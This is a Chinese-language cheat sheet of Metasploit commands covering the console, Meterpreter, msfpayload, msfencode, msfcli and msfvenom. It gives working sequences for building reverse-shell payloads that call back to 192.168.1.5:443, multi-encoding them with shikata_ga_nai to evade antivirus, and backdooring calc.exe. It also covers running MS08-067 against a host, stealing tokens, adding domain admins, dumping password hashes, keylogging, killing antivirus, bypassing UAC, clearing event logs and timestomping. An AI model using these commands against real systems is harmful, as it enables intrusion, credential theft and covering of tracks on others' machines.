1.MSF终端命令
show exploit
列出metasploit框架中的所有渗透攻击模块。
show payloads
列出metasploit框架中的所有攻击载荷。
show auxiliary
列出metasploit框架中的所有辅助攻击模块。
search name
查找metasploit框架中的所有渗透攻击和其他模块。
info
展示出制定渗透攻击或模块的相关信息。
use name
装载一个渗透攻击或者模块。
LHOST
目标主机链接的IP地址。
RHOST
远程主机或者目标主机。
set function
设置特定的配置参数。
setg function
以全局方式设置特定的配置参数。
show options
列出某个渗透攻击或模块中所有的参数配置。
show targets
列出渗透攻击所支持的目标平台。
set target num
指定你所知道的目标的操作系统以及补丁版本类型。
set payload
指定想要使用的攻击载荷。
show advanced
列出所有高级配置选项。
set autorunscript migrate -f.
在渗透攻击完成后,将自动迁移到另一个进程。
check 检测目标是否对选定渗透攻击存在相应安全漏洞
exploit
执行渗透攻击或模块来攻击目标。
exploit -j
在计划任务下进行渗透攻击(攻击将在后台进行)
exploit -z
渗透攻击成功后不与会话进行交互。
exploit -e encoder
制定使用的攻击载荷编码方式
exploit -h
列出exploit命令的帮助信息。
sessions -l
列出可用的交互会话(在处理多个shell时使用)
sessions -l -v
列出所有可用的交互会话以及会话详细信息,例如:攻击系统时使用了哪个安全漏洞。
sessions -s script
在所有活跃的meterpreter会话中运行一个特定的meterpreter脚本。
sessions -K
杀死所有活跃的交互会话。
sessions -c cmd
在所有活跃的metaerpreter会话上执行一个命令。
sessions -u sessionID
升级一个普通的win32shell到meterpreter shell。
db_create name
创建一个数据库驱动攻击所要使用的数据库。
db_nmap
利用nmap并把所有扫描数据库存储到数据库中。
db_autopwn -h
展示出db_autopwn命令的帮助信息。
db_autopwn -p -r -e
对所有发现的开放端口执行db_autopwn,攻击所有系统,并使用一个反弹式shell。
db_destroy
删除当前数据库。
db_destroy user:password@host:port/database
使用高级选项来删除数据库。
2.metapreter命令
help
打开帮助
run scriptname
运行meterpreter脚本,在scripts/meterpreter目录下可查看到所有脚本名。
sysinfo
列出受控主机的系统信息。
ls
列出目标主机的文件和文件夹信息。
use priv
加载特权提升扩展模块,来扩展meterpreter库。
ps
显示所有运行进程以及关联的用户账户。
migrate PID
迁移到一个指定的进程ID
use incognito
加载inconito功能(用来盗取目标主机的令牌或是假冒用户)
list_tokens -u
列出目标主机用户组的可用令牌。
impersonate_token DOMAIN_NAME\\USERNAME
假冒目标主机上的可用令牌。
steal_token
盗窃给定进程的可用令牌并进行令牌假冒。
drop_token
停止假冒当前的令牌。
getsystem
通过各种攻击向量来提升到系统用户权限。
shell
以所有可用令牌来运行一个交互的shell。
execute -f cmd.exe -i
执行cmd.exe命令并进行交互。
execute -f cmd.exe -i -t
以所有可用令牌来执行cmd命令。
execute -f cmd.exe -i -H -t
以所有可用令牌来执行cmd命令并隐藏该进程。
rev2self
回到控制目标主机的初始用户账户下。
reg command
在目标主机注册表中进行交互,创建,删除和查询等操作。
setdesktop number
切换到另一个用户界面(该功能基于那些用户已登录)。
screenshot
对目标主机的屏幕进行截图。
upload file
向目标主机上传文件。
download file
从目标主机下载文件。
keyscan_dump存储目标主机上或许的键盘记录。
getprivs
尽可能多的获取目标主机上的特权。
uietl enable keyboard/mouse
接管目标主机的键盘和鼠标。
background
将你当前的meterpreter shell转为后台执行。
hashdump
导出目标主机中的口令哈希值。
use sniffer
加载嗅探模块。
sniffer_interfaces
列出目标主机所有开放的网络接口。
sniffer_dump interfaceID pcapname
在目标主机上启动嗅探。
sniffer_start interfaceID packet_buffer
在目标主机上针对特定范围的数据包缓冲区启动嗅探。
sniffer_stats interfaceID
获取正在实施嗅探网络接口的统计数据
sniffer_stop interfaceID
停止嗅探。
add_user username password -h ip
在远程目标主机上添加一个用户。
add_group_user “Domain Adimins”username -h ip
将用户添加到目标主机的域管理员组中。
clearev
清除目标主机上的日志记录。
timestomp
修改文件属性,例如修改文件的创建时间(反取证调差)。
reboot
重启目标主机。
3.MSFpayload命令
msfpayload -h
MSFpayload 的帮助信息。
msfpayload windows/meterpreter/bind_tcp O
列出所有可用的攻击载荷。
msfpayload windows/metarpreter/bind_tcp O.
列出所有windows/meterpreter/bind_tcp 下攻击载荷的配置项(任何攻击载荷都是可以配置的)。
msfpayload windows/metaerpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 X>payload.exe
创建一个metarpreter的reverse_tcp 攻击载荷回连到192.168.1.5的443端口,将其保存为名为payload.exe的windows可执行程序。
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R>payload.ray
与上面生成同样的攻击载荷,到导成原始格式的文件,该文件将在后面的MSFencode中使用。
msfpayload windows/meterpreter/bind_tcp LPORT=443 C>payload.c
与上面生成同样的攻击载荷,但导出成C格式的shellcode。
msfpayload windows/meterpreter/bind_tcp LPORT=443 J>payload.java
导出成以%u编码方式的javaScript语言字符串。
4.MSFencode命令
msfencode -h
列出MSFencode的帮助信息。
msfencode -l
列出所有可用的编码器。
msfencode -t(c,eif.exe,java,js_be,perl,raw,ruby,vba,vbs,loop-vbs,asp,war,macho)
显示编码缓冲区的格式。
msfencode -i payload.raw -o encoded_payload,exe -e x86/shikata_ga_nai -c 5 -t exe
使用 shikata_nai编码器对payload.raw文件进行5次编码,然后导出一个名为encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -e x86/_countdown -c 5 -t raw|msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe
创建一个经过多种编码格式嵌套编码的攻击载荷。
msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c
创建一个纯字母 数字的shellcode,由ESI寄存器指向shellcode,以C语言格式输出。
5.MSFcli命令。
msfcli | grep exploit
仅列出渗透攻击模块。
msfcli | grep exploit/windows
仅列出与Windows相关的渗透攻击模块。
msfcli exploit/windows/smb/msf08_067_netapi PYALOAD=windows/meterpreter/bind_tcp LPORT=443 RHOST=172.16.32.142 E
对172.16.32.142 发起ms08_067_netapi渗透攻击,配置了bind_tcp攻击载荷,并绑定在443端口进行监听。
6.Metasploit高级忍术
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -k -o payload.exe -c x86/shikata_ga_nai -c 7 -t exe
创建一个反弹式的Meterpreter攻击载荷,回连到192.168.1.5 主机的443端口,使用calc.exe作为载荷后门程序,让载荷执行流一直运行在被攻击的应用程序中,最后生成以.shikata_ga_nai编码器编码后的攻击载荷可执行程序payload.exe。
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=443 R|msfencode -x calc.exe -o payload.exe -e x86/shikata_ga_nai -c 7 -t exe
创建一个反弹式的meterpreter攻击载荷,回连到192.168.1.5主机的443端口,使用calc.exe作为载荷后门程序,不让载荷执行流一直运行在被攻击的应用程序中,同时在攻击载荷执行后也不会再目标主机上弹出任何信息。这种配置非常有用,当你通过浏览器漏洞控制了远程主机,并不想让计算机程序打开呈现在目标用户面前,同样,最后生成用.shikata_ga_nai 编码的攻击载荷程序payload.exe。
msfpayload windows/meterpreter/bind_tcp LPORT=443 R|msfencode -0 payload.exe -e x86/shikata_ga_nai -c 7 exe & & msfcli multi/bandler PAYLOAD=windows/meterpreter/bind_tcp LPORT=443 E
创建一个raw格式的bind_tcp模式Meterpreter攻击载荷,用shikata_ga_nai编码7次,输出以payload.exe命名的windows可执行程序文件,同时启用多路监听方式进行执行。
7.MSFvenom
利用MSFvenom,一个集成套件,来创建和编码你的攻击载荷。
msfvenom --payload
windows/meterpreter/reverse_tcp --format exe --encoder x86/shikata_ga_nai
LHOST=172.16.1.32 LPORT=443 > msf.exe
[*] x86/shikata_ga_nai succeeded with size 317(iteration=1)
root://opt/framework3/msf3#
这一行命令就可以创建一个攻击载荷并自动产生出可执行文件格式。
8.Meterpreter后渗透攻击阶段命令。
在Windows主机上使用metarpreter进行提权操作。
meterpreter>use priv
meterpreter>getsystem
从一个给定的进程ID中窃取一个域管理员组令牌,添加一个域账户,并把域账户添加到域管理员组中。
meterpreter>ps
meterpreter>steal_token 1784
meterpreter>shell
c:\windows\sysem32>user metasploit @password /ADD /DOMAIN
c:\windows\sysem32>net group "Domain Admins" metasploit /ADD /DOMAIN
从SAM数据库中导出密码的哈希值。
meterpreter>use priv
meterpreter>getsystem
meterpreter>hashdump
提示:在widonws 2008中,如果getsystem命令和hashdump命令抛出异常情况时,你需要迁移到一个以SYSTEM系统权限运行的进程中。
自动迁移到一个独立进程。
meterpreter>run migrate
通过meterpreter的killav脚步来杀死目标主机运行的杀毒软件进程。
meterpreter>run kallav
针对一个特定的进程捕获目标主机上的键盘记录:
meterpreter>ps
meterpreter>migrate 1436
meterpreter>kayscan_start
meterpreter>kayscan_start
meterpreter>keyscan_dump
meterpreter>kayscan_stop
使用匿名方式来假冒管理员:
meterpreter>use incognito
meterpreter>list_tokens -u
meterpreter>use priv
meterpreter>getsystem
meterpreter>list_tokens -u
meterpreter>impersonate_token IHAZSECURITY\\Admininistrator
查看目标主机都采取了那些防范保护措施,列出帮助菜单,关闭防火墙以及其它我们发现的保护措施。
meterpreter>run getcountermeasure
meterpreter>run getcountermeasure -h
meterpreter>run getcountermeasure -d -k
识别被控制的主机是否是一台虚拟机。
meterpreter>run checkvm
在一个meterpreter会话界面中使用cmd shell。
meterpreter>shell
获取目标主机的图形界面(VNC).
meterpreter>run vnc
使正在运行的meterpreter界面在后台运行。
meterpreter>background
绕过windows的用户账户控制(UAC)机制。
meterpreter>run post/windows/escalate/bypassuac
导出苹果OS-X系统的口令哈希值。
meterpreter>run post/osx/gather/hashdump
导出linux系统的口令哈希值。
meterpreter>run post/linux/gather/hashdump